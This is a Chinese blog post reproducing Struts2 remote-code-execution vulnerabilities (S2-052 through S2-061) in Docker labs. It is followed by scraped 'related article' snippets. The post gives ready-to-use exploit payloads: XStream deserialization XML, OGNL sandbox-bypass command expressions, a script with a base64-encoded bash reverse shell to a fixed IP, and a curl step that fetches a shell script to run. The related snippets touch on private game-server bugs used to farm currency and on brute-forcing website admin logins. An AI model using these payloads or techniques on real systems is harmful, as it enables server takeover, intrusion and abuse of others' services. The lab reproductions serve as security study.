框架/组件漏洞系列1:struts2漏洞汇总

article/2025/9/23 7:55:09

在这里插入图片描述

前言:

本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。

一、Struts简介

1、简介

基本介绍:

Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。

在过去多年的时间中,Struts2曾被爆出过许多安全漏洞,业内对其命名也从S2-001命名到了S2-061,也就是说前前后后一共产生了61个安全漏洞,其中的两个大类是DDOS漏洞个RCE漏洞,而本次我们复现、共享的漏洞主要是最近几年的RCE漏洞。

最近几年漏洞信息 :

  • S2-052:REST插件使用到XStreamHandler处理xml数据,由于未对xml数据做任何过滤,在进行发序列xml数据转换为Object时导致RCE
  • S2-053:Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式,导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。
  • S2-057:网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生
  • S2-059:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
  • S2-061:对S2-059的沙盒绕过。

2、struts2框架判断

看url里面的连接,如果是XXX.action结尾或直接XXX.do结尾的,就是struts框架写的。

如果URL连接的文件没有后缀,则可能是struts2框架写的,看HTMl源码中加载/提交的文件后缀可判断。

还是不行,就可以通过传入大量错误数据,使其报错,看报错内容来判断。

二、S2-052 RCE漏洞

1、漏洞简介

Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。

影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

漏洞POC:

<?xml version="1.0" encoding="utf-8"?><map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"><command><string>你要执行的代码</string></command> <redirectErrorStream>false</redirectErrorStream></next></iter> <filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/></method> <name>foo</name></filter> <next class="string">foo</next></serviceIterator> <lock/></cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer/> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed></is> <consumed>false</consumed></dataSource> <transferFlavors/></dataHandler> <dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry> <entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry>
</map>

2、漏洞复现

  1. 使用docker搭建其漏洞环境,访问8080端口,选择任意一个账号进行编辑,使用burp suite 进行抓包。
    在这里插入图片描述

  2. 修改请求头中的Content-Type为application/xml,修改Post数据为poc内容,并将执行的代码改为自己的。返回500错误,理论上来说代码执行成功。
    在这里插入图片描述

  3. 事实证明,理论上终究只是理论上,反弹shell并没有成功。于是使用github的POC进行getshell。poc地址:https://github.com/wooluo/S2-052。脚本运行成功,但执行命令也失败,艹了。

三、S2-053 RCE漏洞

1、漏洞简介

原理:

s2-053漏洞产生的原因是Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。(没咋懂)

影响版本: Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10

漏洞POC(命令执行点在 #cmd=‘whoami’):

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

2、漏洞复现

  1. 使用docker搭建起漏洞环境,访问8080端口,能正常访问,说明漏洞环境启用成功。

  2. 访问hello.action,输入一个表达式:%{6*6},输出结果为36,说明漏洞存在。
    在这里插入图片描述

  3. 输入POC,看执行效果,如图,返回结果为root.
    在这里插入图片描述

  4. kali监听端口,使用bash命令,执行poc反弹shell.
    在这里插入图片描述

四、S2-057 RCE漏洞

1、漏洞简介

漏洞原理:

定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。(懵逼)

影响版本: Struts 2.3 - Struts 2.3.34,Struts 2.5 - Struts 2.5.16

漏洞EXP: https://github.com/Ivan1ee/struts2-057-exp

2、漏洞复现

  1. 使用docker搭建好漏洞环境,访问index.action,如下界面,说明搭建成功。
    在这里插入图片描述

  2. 使用poc执行算术运算poc:struts2-showcase/${(111+111)}/actionChain1.action, 访问后变为:/struts2-showcase/222/register2.action
    在这里插入图片描述

  3. 构造payload,执行命令id;

    payload: ${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
    

    对payload进行url编码,,并附加到url中,使用bp重放:

    请求内容:GET /struts2-showcase/%24%7B%20(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B%27struts.valueStack%27%5D.context).(%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action HTTP/1.1
    

    发生跳转并得到id返回值:
    在这里插入图片描述

五、S2-059 RCE漏洞

1、漏洞简介

漏洞产生原因: s2-059产生的原因为攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。

影响版本: Struts 2.0.0 - Struts 2.5.20

poc:

import requests
url = "http://127.0.0.1:8080"
data1 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'))}"
}
# 反弹shell的命令,需要自行进行编码替换。
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)

2、漏洞复现

  1. 访问docker搭建的初始页面,显示id内容。

  2. 根据漏洞信息,可以输入一个OGNL表达式看是否存在漏洞,此处输入payload: id=%25{4*6},成功执行表达式,说明漏洞存在。
    在这里插入图片描述

  3. 使用bash反弹shell,需要将bash命令进行base64编码。编码后:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

  4. 使用poc进行测试,反弹shell此处踩坑,按照poc来不能反弹shell。

  5. 换个方式getshell:使用python开启临时http服务,将反弹shell的语句写入shell.sh中,修改POC中的命令为curl -o /tmp/shell.sh http://your_HTTP_ip:your_Port/shell.sh。执行poc后成功下载shell.sh,再修改POC中的bash命令为bash /tmp/sh,执行成功并反弹shell。
    在这里插入图片描述

六、S2-061 RCE漏洞

1、漏洞简介

漏洞原理:

s2-061漏洞产生的原因是Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x}x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。

影响范围: struts 2.0.0 - struts 2.5.25

漏洞poc: https://github.com/wuzuowei/CVE-2020-17530

2、漏洞复现

  1. 访问docker搭建的web服务,发现是和s2-059的一样,尝试执行算数运算,发现能成功执行。

  2. 尝试使用s2-059的poc执行命令,发现不能正常执行,因此只能照搬s2-061的复现方法进行。

  3. 首先抓包后修改Content-Type为multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF,并加入以下内容:

    ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
    Content-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
    ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
    
  4. 此处使用原始的GTE传输方式,并不能回显命令内容:
    在这里插入图片描述

  5. 改用POST传输数据,成功执行命令。
    在这里插入图片描述

  6. 修改命令内容,反弹shell。bash反弹shell命令需要进行base64编码。编码地址:https://www.jackson-t.ca/runtime-exec-payloads.html,发送数据后成功执行并反弹shell。
    在这里插入图片描述


http://chatgpt.dhexx.cn/article/8fDVQLYS.shtml

相关文章

struts2漏洞

文章目录 漏洞一、struts2漏洞 S2-001漏洞原理复现 二、struts2漏洞 S2-005原理 分析一下003复现 三、struts2漏洞s2-007四、struts2漏洞 S2-008原理复现 五、struts2漏洞 S2-009原理复现 六、struts2漏洞 S2-012原理复现 七、struts2漏洞 S2-013原理复现 八、struts2漏洞 S2-0…

传奇私服搭建+微端

微端服务器引擎 数据库 客户端 版本 本来想发网盘链接&#xff0c;文件涉及敏感无法分享&#xff0c;需要的可以私下给你发。 企鹅号&#xff1a;1404765471 首先准备 1.三台服务器&#xff08;服务端服务器 微端服务器 列表服务器&#xff09;推荐Windows2008系统 2.私服…

传奇开服怎么开服?不会技术自己能开服吗?传奇开服需要准备什么?前期需要投入多少?

传奇开服怎么开服&#xff1f;不会技术自己能开服吗&#xff1f;传奇开服需要准备什么&#xff1f;前期需要投入多少&#xff1f; 作为经典怀旧游戏&#xff0c;传奇赢得了许多人的青睐&#xff0c;在这个科技的时代&#xff0c;玩服已经满足不了了&#xff0c;多数人会选择自己…

gm修改爆率需要重启服务器吗,传奇SF服务端上修改怪物爆率图文教程

修改怪物爆率基本上是每个版本在改的时候要走的一步&#xff0c;因为每个GM思路不同&#xff0c;想法不同&#xff0c;他给玩家展现出来的版本也不同&#xff0c;就是自己玩单机也要去改&#xff0c;谁不想爆率高点对吧&#xff0c;今天给大家讲解一下通过修改服务端的怪物爆率…

传奇私服游戏支付接口申请(已解决)

传奇游戏是一款经典打怪升级-PK游戏&#xff0c;盛大游戏公司于2001年9月发布&#xff0c;随后出现了众多传奇私服游戏版本。到现在依然受很多人喜爱&#xff0c;经历了多次升级换代&#xff0c;现已转变为游戏体验更加细腻的页游和手游&#xff0c;成为了小成本高收益的热门游…

传奇开服架设教程

传奇架设其实很简单 很多网友非常爱玩这款游戏&#xff0c;可能还有朋友不知道怎么架设这款游戏 今天特意写篇传奇架设教程&#xff0c;希望大家都能打造出真正属于自己的传奇 首先传奇架设需要准备以下几个软件 准备工具&#xff1a; 1、传奇服务端&#xff08;版本&#…

传奇私服搭建网站的几种方法

搭建网站的几种方法&#xff1a; 一些人&#xff0c;连简单的搭建网站都不会&#xff0c;还要请技术帮忙&#xff0c;真是牛B&#xff0c;这里简单介绍下几种办法 一&#xff1a;2003系统下&#xff0c;直接使用IIS&#xff0c;这个太简单了&#xff0c;桌面上就有IIS&#xff…

传奇h5私服源码+教程

传奇h5私服源码教程 这几天突然想拿服务器做些什么&#xff0c;就想到搭一个私服游戏&#xff0c;学习娱乐一下。废话不多说下面给教程和源码。 传奇h5源码&#xff1a;https://download.csdn.net/download/qq_37258192/11997500 &#xff08;重新上传了1次&#xff0c;积分变…

传奇私服服务器上怎么修改爆率,传奇私服怎么一次性调整爆率

满意答案 yhd514468637 推荐于 2017.10.03 怪物爆率文件在D:\Mirserver\Mir200\Envir\MonItems下面&#xff0c;一般默认的怪物爆率就已经非常不错&#xff0c;但根据服务器人数&#xff0c;有时候还是需要对爆率进行调整。 关于调整沃玛装备 沃玛装备为底级装备&#xff0c;控…

传奇架设-设置GM以及刷装备教程

传奇游戏虽然已经那么多年了&#xff0c;但是新手还是不断的在涌入进来&#xff0c;想学私服技术的也很多。 今天来说一下怎么设置GM&#xff0c;和怎么看命了吧&#xff01;本来想做一个视频的&#xff0c;但是我觉得这个太过简单&#xff0c;图文还来的简单。 《第一章&…

传奇服中怎么刷装备

记得玩传奇的时候&#xff0c;最大的乐趣莫过于一起PK打装备&#xff0c;真的是让人激情四射了&#xff0c;想想都有点小激动呢&#xff0c;呵呵&#xff01;但是等了做了GM以后&#xff0c;这点乐趣真的没有了&#xff0c;感觉打装备PK没有什么意思&#xff0c;倒是觉得刷装备…

传奇SF刷元宝之迷失版本刷叠加材料

传奇迷失版本刷材料漏洞教学 今天给大家带来传奇迷失版刷叠加材料&#xff0c;这个漏洞教学网上有人发过&#xff0c;不过很多人按照教程做了就是不触发。就是因为发布者去头掐尾的&#xff01;最终目的就是让你们加他们所谓的群啊之类的引流罢了&#xff0c; 今天我给大家一个…

传奇SF刷元宝之王者荣耀版本

王者荣耀版本刷元宝卡爆率保姆级教学 王者荣耀版本刷元宝卡爆率详细教学 今天给大家带来传奇王者荣耀版本刷元宝和卡爆率的教程&#xff0c;这个漏洞教学网上有人发过&#xff0c;不过很多人按照教程做了就是不触发。就是因为发布者去头掐尾的&#xff01;最终目的就是让你们加…

网站管理后台帐号密码找回方法

站忘记密码怎么找回? 两个方法 方法一&#xff1a; 登录数据库&#xff0c;把password 下面的这一串加密串 解密一下。我至今没这样弄过&#xff0c;原理是这样&#xff0c;但是我没找到好用的md5 解密网站。一般的都要收费的。 方法二: 在数据库重置一个简单的密码&#x…

【Linux】网站后台设置及管理

文章目录 1. 进入网站后台选择管理,登陆2. 修改全局设置1) 站点信息修改2) 注册访问修改3) 内容设置3. 把网站添加到主网站上去总结1. 进入网站后台选择管理,登陆 从浏览器输入:bbs.zmkjedu.com

网站后台爆破工具:WebCrack

WebCrack简介 WebCrack是一款开源免费的web后台弱口令/万能密码批量爆破、检测工具。 不仅支持如discuz&#xff0c;织梦&#xff0c;phpmyadmin等主流CMS的后台爆破&#xff0c;并且对于绝大多数小众CMS甚至个人开发网站后台都有效果&#xff0c;只需在工具中导入后台地址即…

【Linux】kali破解密码

一、环境描述 Linux version 5.14.0-kali4-686-pae (develkali.org) (gcc-10 (Debian 10.3.0-12) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.16-1kali1 (2021-11-05) 二、操作步骤 &#xff08;1&#xff09;开进grub界面按e&#xff1b; &#…

暴力破解网站后台burpsuite

【实验原理】 Burp Suite是Web应用程序测试的最佳工具之一&#xff0c;其多种功能执行各种任务。请求的拦截和修改&#xff0c;扫描web应用程序漏洞&#xff0c;以暴力破解登录表单&#xff0c;执行会话令牌等多种的随机性检查。 Burp Suite主要有它的以下特点&#xff1a; …

web小白,实战操作拿到网站后台账户和密码

话不多说,直接上赶货,前几天遇到一个网站,就想着怎么拿到他的后台权限 首先我想的是去查看一下他的网站框架是什么,先随便构造个报错,看能不能有什么提示? 我们可以从报错信息中看到一些信息,可以看到网站报错信息,知道了这个网站的框架是thinkphp,而且是thinkphp3…

pbootcms模板忘记后台密码怎么办?

此工具用于忘记PbootCMS后台用户账号密码时进行重置。 新建一个php文件&#xff0c;然后写入下面代码 <?php /*** email admin91084.com* 重置PbootCMS用户密码*/ // 设置字符集编码、IE文档模式 header(Content-Type:text/html; charsetutf-8); header(X-UA-Compatible…